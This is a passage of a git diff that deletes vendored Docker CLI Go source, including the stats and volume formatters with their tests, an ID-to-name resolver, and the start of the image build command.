ResourceReservationNanoCPUs() float64 { - if ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs == 0 { - return float64(0) - } - return float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.NanoCPUs) / 1e9 -} - -func (ctx *serviceInspectContext) ResourceReservationMemory() string { - if ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes == 0 { - return "" - } - return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Reservations.MemoryBytes)) -} - -func (ctx *serviceInspectContext) HasResourceLimits() bool { - if ctx.Service.Spec.TaskTemplate.Resources == nil || ctx.Service.Spec.TaskTemplate.Resources.Limits == nil { - return false - } - return ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs > 0 || ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes > 0 -} - -func (ctx *serviceInspectContext) ResourceLimitsNanoCPUs() float64 { - return float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.NanoCPUs) / 1e9 -} - -func (ctx *serviceInspectContext) ResourceLimitMemory() string { - if ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes == 0 { - return "" - } - return units.BytesSize(float64(ctx.Service.Spec.TaskTemplate.Resources.Limits.MemoryBytes)) -} - -func (ctx *serviceInspectContext) Networks() []string { - var out []string - for _, n := range ctx.Service.Spec.Networks { - out = append(out, n.Target) - } - return out -} - -func (ctx *serviceInspectContext) EndpointMode() string { - if ctx.Service.Spec.EndpointSpec == nil { - return "" - } - - return string(ctx.Service.Spec.EndpointSpec.Mode) -} - -func (ctx *serviceInspectContext) Ports() []swarm.PortConfig { - return ctx.Service.Endpoint.Ports -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats.go b/vendor/github.com/docker/docker/cli/command/formatter/stats.go deleted file mode 100644 index 7997f996d8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/stats.go +++ /dev/null @@ -1,211 +0,0 @@ -package 
formatter - -import ( - "fmt" - "sync" - - units "github.com/docker/go-units" -) - -const ( - winOSType = "windows" - defaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.MemPerc}}\t{{.NetIO}}\t{{.BlockIO}}\t{{.PIDs}}" - winDefaultStatsTableFormat = "table {{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}\t{{.NetIO}}\t{{.BlockIO}}" - - containerHeader = "CONTAINER" - cpuPercHeader = "CPU %" - netIOHeader = "NET I/O" - blockIOHeader = "BLOCK I/O" - memPercHeader = "MEM %" // Used only on Linux - winMemUseHeader = "PRIV WORKING SET" // Used only on Windows - memUseHeader = "MEM USAGE / LIMIT" // Used only on Linux - pidsHeader = "PIDS" // Used only on Linux -) - -// StatsEntry represents represents the statistics data collected from a container -type StatsEntry struct { - Container string - Name string - ID string - CPUPercentage float64 - Memory float64 // On Windows this is the private working set - MemoryLimit float64 // Not used on Windows - MemoryPercentage float64 // Not used on Windows - NetworkRx float64 - NetworkTx float64 - BlockRead float64 - BlockWrite float64 - PidsCurrent uint64 // Not used on Windows - IsInvalid bool - OSType string -} - -// ContainerStats represents an entity to store containers statistics synchronously -type ContainerStats struct { - mutex sync.Mutex - StatsEntry - err error -} - -// GetError returns the container statistics error. -// This is used to determine whether the statistics are valid or not -func (cs *ContainerStats) GetError() error { - cs.mutex.Lock() - defer cs.mutex.Unlock() - return cs.err -} - -// SetErrorAndReset zeroes all the container statistics and store the error. 
-// It is used when receiving time out error during statistics collecting to reduce lock overhead -func (cs *ContainerStats) SetErrorAndReset(err error) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - cs.CPUPercentage = 0 - cs.Memory = 0 - cs.MemoryPercentage = 0 - cs.MemoryLimit = 0 - cs.NetworkRx = 0 - cs.NetworkTx = 0 - cs.BlockRead = 0 - cs.BlockWrite = 0 - cs.PidsCurrent = 0 - cs.err = err - cs.IsInvalid = true -} - -// SetError sets container statistics error -func (cs *ContainerStats) SetError(err error) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - cs.err = err - if err != nil { - cs.IsInvalid = true - } -} - -// SetStatistics set the container statistics -func (cs *ContainerStats) SetStatistics(s StatsEntry) { - cs.mutex.Lock() - defer cs.mutex.Unlock() - s.Container = cs.Container - s.OSType = cs.OSType - cs.StatsEntry = s -} - -// GetStatistics returns container statistics with other meta data such as the container name -func (cs *ContainerStats) GetStatistics() StatsEntry { - cs.mutex.Lock() - defer cs.mutex.Unlock() - return cs.StatsEntry -} - -// NewStatsFormat returns a format for rendering an CStatsContext -func NewStatsFormat(source, osType string) Format { - if source == TableFormatKey { - if osType == winOSType { - return Format(winDefaultStatsTableFormat) - } - return Format(defaultStatsTableFormat) - } - return Format(source) -} - -// NewContainerStats returns a new ContainerStats entity and sets in it the given name -func NewContainerStats(container, osType string) *ContainerStats { - return &ContainerStats{ - StatsEntry: StatsEntry{Container: container, OSType: osType}, - } -} - -// ContainerStatsWrite renders the context for a list of containers statistics -func ContainerStatsWrite(ctx Context, containerStats []StatsEntry) error { - render := func(format func(subContext subContext) error) error { - for _, cstats := range containerStats { - containerStatsCtx := &containerStatsContext{ - s: cstats, - } - if err := format(containerStatsCtx); 
err != nil { - return err - } - } - return nil - } - return ctx.Write(&containerStatsContext{}, render) -} - -type containerStatsContext struct { - HeaderContext - s StatsEntry -} - -func (c *containerStatsContext) Container() string { - c.AddHeader(containerHeader) - return c.s.Container -} - -func (c *containerStatsContext) Name() string { - c.AddHeader(nameHeader) - name := c.s.Name[1:] - return name -} - -func (c *containerStatsContext) ID() string { - c.AddHeader(containerIDHeader) - return c.s.ID -} - -func (c *containerStatsContext) CPUPerc() string { - c.AddHeader(cpuPercHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%.2f%%", c.s.CPUPercentage) -} - -func (c *containerStatsContext) MemUsage() string { - header := memUseHeader - if c.s.OSType == winOSType { - header = winMemUseHeader - } - c.AddHeader(header) - if c.s.IsInvalid { - return fmt.Sprintf("-- / --") - } - if c.s.OSType == winOSType { - return fmt.Sprintf("%s", units.BytesSize(c.s.Memory)) - } - return fmt.Sprintf("%s / %s", units.BytesSize(c.s.Memory), units.BytesSize(c.s.MemoryLimit)) -} - -func (c *containerStatsContext) MemPerc() string { - header := memPercHeader - c.AddHeader(header) - if c.s.IsInvalid || c.s.OSType == winOSType { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%.2f%%", c.s.MemoryPercentage) -} - -func (c *containerStatsContext) NetIO() string { - c.AddHeader(netIOHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.NetworkRx, 3), units.HumanSizeWithPrecision(c.s.NetworkTx, 3)) -} - -func (c *containerStatsContext) BlockIO() string { - c.AddHeader(blockIOHeader) - if c.s.IsInvalid { - return fmt.Sprintf("--") - } - return fmt.Sprintf("%s / %s", units.HumanSizeWithPrecision(c.s.BlockRead, 3), units.HumanSizeWithPrecision(c.s.BlockWrite, 3)) -} - -func (c *containerStatsContext) PIDs() string { - c.AddHeader(pidsHeader) - if c.s.IsInvalid || c.s.OSType == winOSType { 
- return fmt.Sprintf("--") - } - return fmt.Sprintf("%d", c.s.PidsCurrent) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go b/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go deleted file mode 100644 index d5a17cc70e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/stats_test.go +++ /dev/null @@ -1,228 +0,0 @@ -package formatter - -import ( - "bytes" - "testing" - - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestContainerStatsContext(t *testing.T) { - containerID := stringid.GenerateRandomID() - - var ctx containerStatsContext - tt := []struct { - stats StatsEntry - expValue string - expHeader string - call func() string - }{ - {StatsEntry{Container: containerID}, containerID, containerHeader, ctx.Container}, - {StatsEntry{CPUPercentage: 5.5}, "5.50%", cpuPercHeader, ctx.CPUPerc}, - {StatsEntry{CPUPercentage: 5.5, IsInvalid: true}, "--", cpuPercHeader, ctx.CPUPerc}, - {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3}, "0.31 B / 12.3 B", netIOHeader, ctx.NetIO}, - {StatsEntry{NetworkRx: 0.31, NetworkTx: 12.3, IsInvalid: true}, "--", netIOHeader, ctx.NetIO}, - {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3}, "0.1 B / 2.3 B", blockIOHeader, ctx.BlockIO}, - {StatsEntry{BlockRead: 0.1, BlockWrite: 2.3, IsInvalid: true}, "--", blockIOHeader, ctx.BlockIO}, - {StatsEntry{MemoryPercentage: 10.2}, "10.20%", memPercHeader, ctx.MemPerc}, - {StatsEntry{MemoryPercentage: 10.2, IsInvalid: true}, "--", memPercHeader, ctx.MemPerc}, - {StatsEntry{MemoryPercentage: 10.2, OSType: "windows"}, "--", memPercHeader, ctx.MemPerc}, - {StatsEntry{Memory: 24, MemoryLimit: 30}, "24 B / 30 B", memUseHeader, ctx.MemUsage}, - {StatsEntry{Memory: 24, MemoryLimit: 30, IsInvalid: true}, "-- / --", memUseHeader, ctx.MemUsage}, - {StatsEntry{Memory: 24, MemoryLimit: 30, OSType: "windows"}, "24 B", winMemUseHeader, ctx.MemUsage}, - {StatsEntry{PidsCurrent: 10}, "10", 
pidsHeader, ctx.PIDs}, - {StatsEntry{PidsCurrent: 10, IsInvalid: true}, "--", pidsHeader, ctx.PIDs}, - {StatsEntry{PidsCurrent: 10, OSType: "windows"}, "--", pidsHeader, ctx.PIDs}, - } - - for _, te := range tt { - ctx = containerStatsContext{s: te.stats} - if v := te.call(); v != te.expValue { - t.Fatalf("Expected %q, got %q", te.expValue, v) - } - - h := ctx.FullHeader() - if h != te.expHeader { - t.Fatalf("Expected %q, got %q", te.expHeader, h) - } - } -} - -func TestContainerStatsContextWrite(t *testing.T) { - tt := []struct { - context Context - expected string - }{ - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - { - Context{Format: "table {{.MemUsage}}"}, - `MEM USAGE / LIMIT -20 B / 20 B --- / -- -`, - }, - { - Context{Format: "{{.Container}} {{.CPUPerc}}"}, - `container1 20.00% -container2 -- -`, - }, - } - - for _, te := range tt { - stats := []StatsEntry{ - { - Container: "container1", - CPUPercentage: 20, - Memory: 20, - MemoryLimit: 20, - MemoryPercentage: 20, - NetworkRx: 20, - NetworkTx: 20, - BlockRead: 20, - BlockWrite: 20, - PidsCurrent: 2, - IsInvalid: false, - OSType: "linux", - }, - { - Container: "container2", - CPUPercentage: 30, - Memory: 30, - MemoryLimit: 30, - MemoryPercentage: 30, - NetworkRx: 30, - NetworkTx: 30, - BlockRead: 30, - BlockWrite: 30, - PidsCurrent: 3, - IsInvalid: true, - OSType: "linux", - }, - } - var out bytes.Buffer - te.context.Output = &out - err := ContainerStatsWrite(te.context, stats) - if err != nil { - assert.Error(t, err, te.expected) - } else { - assert.Equal(t, out.String(), te.expected) - } - } -} - -func TestContainerStatsContextWriteWindows(t *testing.T) { - tt := []struct { - context Context - expected string - }{ - { - Context{Format: "table {{.MemUsage}}"}, - `PRIV WORKING SET -20 B --- / -- 
-`, - }, - { - Context{Format: "{{.Container}} {{.CPUPerc}}"}, - `container1 20.00% -container2 -- -`, - }, - { - Context{Format: "{{.Container}} {{.MemPerc}} {{.PIDs}}"}, - `container1 -- -- -container2 -- -- -`, - }, - } - - for _, te := range tt { - stats := []StatsEntry{ - { - Container: "container1", - CPUPercentage: 20, - Memory: 20, - MemoryLimit: 20, - MemoryPercentage: 20, - NetworkRx: 20, - NetworkTx: 20, - BlockRead: 20, - BlockWrite: 20, - PidsCurrent: 2, - IsInvalid: false, - OSType: "windows", - }, - { - Container: "container2", - CPUPercentage: 30, - Memory: 30, - MemoryLimit: 30, - MemoryPercentage: 30, - NetworkRx: 30, - NetworkTx: 30, - BlockRead: 30, - BlockWrite: 30, - PidsCurrent: 3, - IsInvalid: true, - OSType: "windows", - }, - } - var out bytes.Buffer - te.context.Output = &out - err := ContainerStatsWrite(te.context, stats) - if err != nil { - assert.Error(t, err, te.expected) - } else { - assert.Equal(t, out.String(), te.expected) - } - } -} - -func TestContainerStatsContextWriteWithNoStats(t *testing.T) { - var out bytes.Buffer - - contexts := []struct { - context Context - expected string - }{ - { - Context{ - Format: "{{.Container}}", - Output: &out, - }, - "", - }, - { - Context{ - Format: "table {{.Container}}", - Output: &out, - }, - "CONTAINER\n", - }, - { - Context{ - Format: "table {{.Container}}\t{{.CPUPerc}}", - Output: &out, - }, - "CONTAINER CPU %\n", - }, - } - - for _, context := range contexts { - ContainerStatsWrite(context.context, []StatsEntry{}) - assert.Equal(t, context.expected, out.String()) - // Clean buffer - out.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume.go b/vendor/github.com/docker/docker/cli/command/formatter/volume.go deleted file mode 100644 index 90c9b13536..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/volume.go +++ /dev/null @@ -1,121 +0,0 @@ -package formatter - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - 
units "github.com/docker/go-units" -) - -const ( - defaultVolumeQuietFormat = "{{.Name}}" - defaultVolumeTableFormat = "table {{.Driver}}\t{{.Name}}" - - volumeNameHeader = "VOLUME NAME" - mountpointHeader = "MOUNTPOINT" - linksHeader = "LINKS" - // Status header ? -) - -// NewVolumeFormat returns a format for use with a volume Context -func NewVolumeFormat(source string, quiet bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultVolumeQuietFormat - } - return defaultVolumeTableFormat - case RawFormatKey: - if quiet { - return `name: {{.Name}}` - } - return `name: {{.Name}}\ndriver: {{.Driver}}\n` - } - return Format(source) -} - -// VolumeWrite writes formatted volumes using the Context -func VolumeWrite(ctx Context, volumes []*types.Volume) error { - render := func(format func(subContext subContext) error) error { - for _, volume := range volumes { - if err := format(&volumeContext{v: *volume}); err != nil { - return err - } - } - return nil - } - return ctx.Write(&volumeContext{}, render) -} - -type volumeContext struct { - HeaderContext - v types.Volume -} - -func (c *volumeContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *volumeContext) Name() string { - c.AddHeader(volumeNameHeader) - return c.v.Name -} - -func (c *volumeContext) Driver() string { - c.AddHeader(driverHeader) - return c.v.Driver -} - -func (c *volumeContext) Scope() string { - c.AddHeader(scopeHeader) - return c.v.Scope -} - -func (c *volumeContext) Mountpoint() string { - c.AddHeader(mountpointHeader) - return c.v.Mountpoint -} - -func (c *volumeContext) Labels() string { - c.AddHeader(labelsHeader) - if c.v.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.v.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *volumeContext) Label(name string) string { - - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", 
"_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.v.Labels == nil { - return "" - } - return c.v.Labels[name] -} - -func (c *volumeContext) Links() string { - c.AddHeader(linksHeader) - if c.v.UsageData == nil { - return "N/A" - } - return fmt.Sprintf("%d", c.v.UsageData.RefCount) -} - -func (c *volumeContext) Size() string { - c.AddHeader(sizeHeader) - if c.v.UsageData == nil { - return "N/A" - } - return units.HumanSize(float64(c.v.UsageData.Size)) -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go b/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go deleted file mode 100644 index 9ec18b6916..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/volume_test.go +++ /dev/null @@ -1,189 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestVolumeContext(t *testing.T) { - volumeName := stringid.GenerateRandomID() - - var ctx volumeContext - cases := []struct { - volumeCtx volumeContext - expValue string - expHeader string - call func() string - }{ - {volumeContext{ - v: types.Volume{Name: volumeName}, - }, volumeName, volumeNameHeader, ctx.Name}, - {volumeContext{ - v: types.Volume{Driver: "driver_name"}, - }, "driver_name", driverHeader, ctx.Driver}, - {volumeContext{ - v: types.Volume{Scope: "local"}, - }, "local", scopeHeader, ctx.Scope}, - {volumeContext{ - v: types.Volume{Mountpoint: "mountpoint"}, - }, "mountpoint", mountpointHeader, ctx.Mountpoint}, - {volumeContext{ - v: types.Volume{}, - }, "", labelsHeader, ctx.Labels}, - {volumeContext{ - v: types.Volume{Labels: map[string]string{"label1": "value1", "label2": "value2"}}, - }, "label1=value1,label2=value2", labelsHeader, ctx.Labels}, - } - - for _, c := range cases { - ctx = c.volumeCtx - v := c.call() - if strings.Contains(v, ",") { - 
compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } -} - -func TestVolumeContextWrite(t *testing.T) { - cases := []struct { - context Context - expected string - }{ - - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table format - { - Context{Format: NewVolumeFormat("table", false)}, - `DRIVER VOLUME NAME -foo foobar_baz -bar foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table", true)}, - `foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table {{.Name}}", false)}, - `VOLUME NAME -foobar_baz -foobar_bar -`, - }, - { - Context{Format: NewVolumeFormat("table {{.Name}}", true)}, - `VOLUME NAME -foobar_baz -foobar_bar -`, - }, - // Raw Format - { - Context{Format: NewVolumeFormat("raw", false)}, - `name: foobar_baz -driver: foo - -name: foobar_bar -driver: bar - -`, - }, - { - Context{Format: NewVolumeFormat("raw", true)}, - `name: foobar_baz -name: foobar_bar -`, - }, - // Custom Format - { - Context{Format: NewVolumeFormat("{{.Name}}", false)}, - `foobar_baz -foobar_bar -`, - }, - } - - for _, testcase := range cases { - volumes := []*types.Volume{ - {Name: "foobar_baz", Driver: "foo"}, - {Name: "foobar_bar", Driver: "bar"}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := VolumeWrite(testcase.context, volumes) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestVolumeContextWriteJSON(t *testing.T) { - volumes := []*types.Volume{ - {Driver: "foo", Name: "foobar_baz"}, - {Driver: "bar", Name: "foobar_bar"}, - 
} - expectedJSONs := []map[string]interface{}{ - {"Driver": "foo", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_baz", "Scope": "", "Size": "N/A"}, - {"Driver": "bar", "Labels": "", "Links": "N/A", "Mountpoint": "", "Name": "foobar_bar", "Scope": "", "Size": "N/A"}, - } - out := bytes.NewBufferString("") - err := VolumeWrite(Context{Format: "{{json .}}", Output: out}, volumes) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestVolumeContextWriteJSONField(t *testing.T) { - volumes := []*types.Volume{ - {Driver: "foo", Name: "foobar_baz"}, - {Driver: "bar", Name: "foobar_bar"}, - } - out := bytes.NewBufferString("") - err := VolumeWrite(Context{Format: "{{json .Name}}", Output: out}, volumes) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, volumes[i].Name) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go b/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go deleted file mode 100644 index 511b1a8f54..0000000000 --- a/vendor/github.com/docker/docker/cli/command/idresolver/idresolver.go +++ /dev/null @@ -1,90 +0,0 @@ -package idresolver - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "github.com/docker/docker/pkg/stringid" -) - -// IDResolver provides ID to Name resolution. -type IDResolver struct { - client client.APIClient - noResolve bool - cache map[string]string -} - -// New creates a new IDResolver. 
-func New(client client.APIClient, noResolve bool) *IDResolver { - return &IDResolver{ - client: client, - noResolve: noResolve, - cache: make(map[string]string), - } -} - -func (r *IDResolver) get(ctx context.Context, t interface{}, id string) (string, error) { - switch t := t.(type) { - case swarm.Node: - node, _, err := r.client.NodeInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - if node.Spec.Annotations.Name != "" { - return node.Spec.Annotations.Name, nil - } - if node.Description.Hostname != "" { - return node.Description.Hostname, nil - } - return id, nil - case swarm.Service: - service, _, err := r.client.ServiceInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - return service.Spec.Annotations.Name, nil - case swarm.Task: - // If the caller passes the full task there's no need to do a lookup. - if t.ID == "" { - var err error - - t, _, err = r.client.TaskInspectWithRaw(ctx, id) - if err != nil { - return id, nil - } - } - taskID := stringid.TruncateID(t.ID) - if t.ServiceID == "" { - return taskID, nil - } - service, err := r.Resolve(ctx, swarm.Service{}, t.ServiceID) - if err != nil { - return "", err - } - return fmt.Sprintf("%s.%d.%s", service, t.Slot, taskID), nil - default: - return "", fmt.Errorf("unsupported type") - } - -} - -// Resolve will attempt to resolve an ID to a Name by querying the manager. -// Results are stored into a cache. -// If the `-n` flag is used in the command-line, resolution is disabled. 
-func (r *IDResolver) Resolve(ctx context.Context, t interface{}, id string) (string, error) { - if r.noResolve { - return id, nil - } - if name, ok := r.cache[id]; ok { - return name, nil - } - name, err := r.get(ctx, t, id) - if err != nil { - return "", err - } - r.cache[id] = name - return name, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/image/build.go b/vendor/github.com/docker/docker/cli/command/image/build.go deleted file mode 100644 index 0c88af5fcd..0000000000 --- a/vendor/github.com/docker/docker/cli/command/image/build.go +++ /dev/null @@ -1,477 +0,0 @@ -package image - -import ( - "archive/tar" - "bufio" - "bytes" - "fmt" - "io" - "os" - "path/filepath" - "regexp" - "runtime" - - "golang.org/x/net/context" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerignore" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/fileutils" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/pkg/streamformatter" - "github.com/docker/docker/pkg/urlutil" - "github.com/docker/docker/reference" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type buildOptions struct { - context string - dockerfileName string - tags opts.ListOpts - labels opts.ListOpts - buildArgs opts.ListOpts - ulimits *runconfigopts.UlimitOpt - memory string - memorySwap string - shmSize string - cpuShares int64 - cpuPeriod int64 - cpuQuota int64 - cpuSetCpus string - cpuSetMems string - cgroupParent string - isolation string - quiet bool - noCache bool - rm bool - forceRm bool - pull bool - cacheFrom []string - compress bool - securityOpt []string - networkMode string - 
squash bool -} - -// NewBuildCommand creates a new `docker build` command -func NewBuildCommand(dockerCli *command.DockerCli) *cobra.Command { - ulimits := make(map[string]*units.Ulimit) - options := buildOptions{ - tags: opts.NewListOpts(validateTag), - buildArgs: opts.NewListOpts(runconfigopts.ValidateEnv), - ulimits: runconfigopts.NewUlimitOpt(&ulimits), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "build [OPTIONS] PATH | URL | -", - Short: "Build an image from a Dockerfile", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - options.context = args[0] - return runBuild(dockerCli, options) - }, - } - - flags := cmd.Flags() - - flags.VarP(&options.tags, "tag", "t", "Name and optionally a tag in the 'name:tag' format") - flags.Var(&options.buildArgs, "build-arg", "Set build-time variables") - flags.Var(options.ulimits, "ulimit", "Ulimit options") - flags.StringVarP(&options.dockerfileName, "file", "f", "", "Name of the Dockerfile (Default is 'PATH/Dockerfile')") - flags.StringVarP(&options.memory, "memory", "m", "", "Memory limit") - flags.StringVar(&options.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") - flags.StringVar(&options.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") - flags.Int64VarP(&options.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") - flags.Int64Var(&options.cpuPeriod, "cpu-period", 0, "Limit the CPU CFS (Completely Fair Scheduler) period") - flags.Int64Var(&options.cpuQuota, "cpu-quota", 0, "Limit the CPU CFS (Completely Fair Scheduler) quota") - flags.StringVar(&options.cpuSetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") - flags.StringVar(&options.cpuSetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") - flags.StringVar(&options.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") - 
flags.StringVar(&options.isolation, "isolation", "", "Container isolation technology") - flags.Var(&options.labels, "label", "Set metadata for an image") - flags.BoolVar(&options.noCache, "no-cache", false, "Do not use cache when building the image") - flags.BoolVar(&options.rm, "rm", true, "Remove intermediate containers after a successful build") - flags.BoolVar(&options.forceRm, "force-rm", false, "Always remove intermediate containers") - flags.BoolVarP(&options.quiet, "quiet", "q", false, "Suppress the build output and print image ID on success") - flags.BoolVar(&options.pull, "pull", false, "Always attempt to pull a newer version of the image") - flags.StringSliceVar(&options.cacheFrom, "cache-from", []string{}, "Images to consider as cache sources") - flags.BoolVar(&options.compress, "compress", false, "Compress the build context using gzip") - flags.StringSliceVar(&options.securityOpt, "security-opt", []string{}, "Security options") - flags.StringVar(&options.networkMode, "network", "default", "Set the networking mode for the RUN instructions during build") - - command.AddTrustedFlags(flags, true) - - flags.BoolVar(&options.squash, "squash", false, "Squash newly built layers into a single new layer") - flags.SetAnnotation("squash", "experimental", nil) - flags.SetAnnotation("squash", "version", []string{"1.25"}) - - return cmd -} - -// lastProgressOutput is the same as progress.Output except -// that it only output with the last update. It is used in -// non terminal scenarios to depresss verbose messages -type lastProgressOutput struct { - output progress.Output -} - -// WriteProgress formats progress information from a ProgressReader. 
-func (out *lastProgressOutput) WriteProgress(prog progress.Progress) error { - if !prog.LastUpdate { - return nil - } - - return out.output.WriteProgress(prog) -} - -func runBuild(dockerCli *command.DockerCli, options buildOptions) error { - - var ( - buildCtx io.ReadCloser - err error - contextDir string - tempDir string - relDockerfile string - progBuff io.Writer - buildBuff io.Writer - ) - - specifiedContext := options.context - progBuff = dockerCli.Out() - buildBuff = dockerCli.Out() - if options.quiet { - progBuff = bytes.NewBuffer(nil) - buildBuff = bytes.NewBuffer(nil) - } - - switch { - case specifiedContext == "-": - buildCtx, relDockerfile, err = builder.GetContextFromReader(dockerCli.In(), options.dockerfileName) - case urlutil.IsGitURL(specifiedContext): - tempDir, relDockerfile, err = builder.GetContextFromGitURL(specifiedContext, options.dockerfileName) - case urlutil.IsURL(specifiedContext): - buildCtx, relDockerfile, err = builder.GetContextFromURL(progBuff, specifiedContext, options.dockerfileName) - default: - contextDir, relDockerfile, err = builder.GetContextFromLocalDir(specifiedContext, options.dockerfileName) - } - - if err != nil { - if options.quiet && urlutil.IsURL(specifiedContext) { - fmt.Fprintln(dockerCli.Err(), progBuff) - } - return fmt.Errorf("unable to prepare context: %s", err) - } - - if tempDir != "" { - defer os.RemoveAll(tempDir) - contextDir = tempDir - } - - if buildCtx == nil { - // And canonicalize dockerfile name to a platform-independent one - relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile) - if err != nil { - return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err) - } - - f, err := os.Open(filepath.Join(contextDir, ".dockerignore")) - if err != nil && !os.IsNotExist(err) { - return err - } - defer f.Close() - - var excludes []string - if err == nil { - excludes, err = dockerignore.ReadAll(f) - if err != nil { - return err - } - } - - if err := 
builder.ValidateContextDirectory(contextDir, excludes); err != nil { - return fmt.Errorf("Error checking context: '%s'.", err) - } - - // If .dockerignore mentions .dockerignore or the Dockerfile - // then make sure we send both files over to the daemon - // because Dockerfile is, obviously, needed no matter what, and - // .dockerignore is needed to know if either one needs to be - // removed. The daemon will remove them for us, if needed, after it - // parses the Dockerfile. Ignore errors here, as they will have been - // caught by validateContextDirectory above. - var includes = []string{"."} - keepThem1, _ := fileutils.Matches(".dockerignore", excludes) - keepThem2, _ := fileutils.Matches(relDockerfile, excludes) - if keepThem1 || keepThem2 { - includes = append(includes, ".dockerignore", relDockerfile) - } - - compression := archive.Uncompressed - if options.compress { - compression = archive.Gzip - } - buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{ - Compression: compression, - ExcludePatterns: excludes, - IncludeFiles: includes, - }) - if err != nil { - return err - } - } - - ctx := context.Background() - - var resolvedTags []*resolvedTag - if command.IsTrusted() { - translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) { - return TrustedReference(ctx, dockerCli, 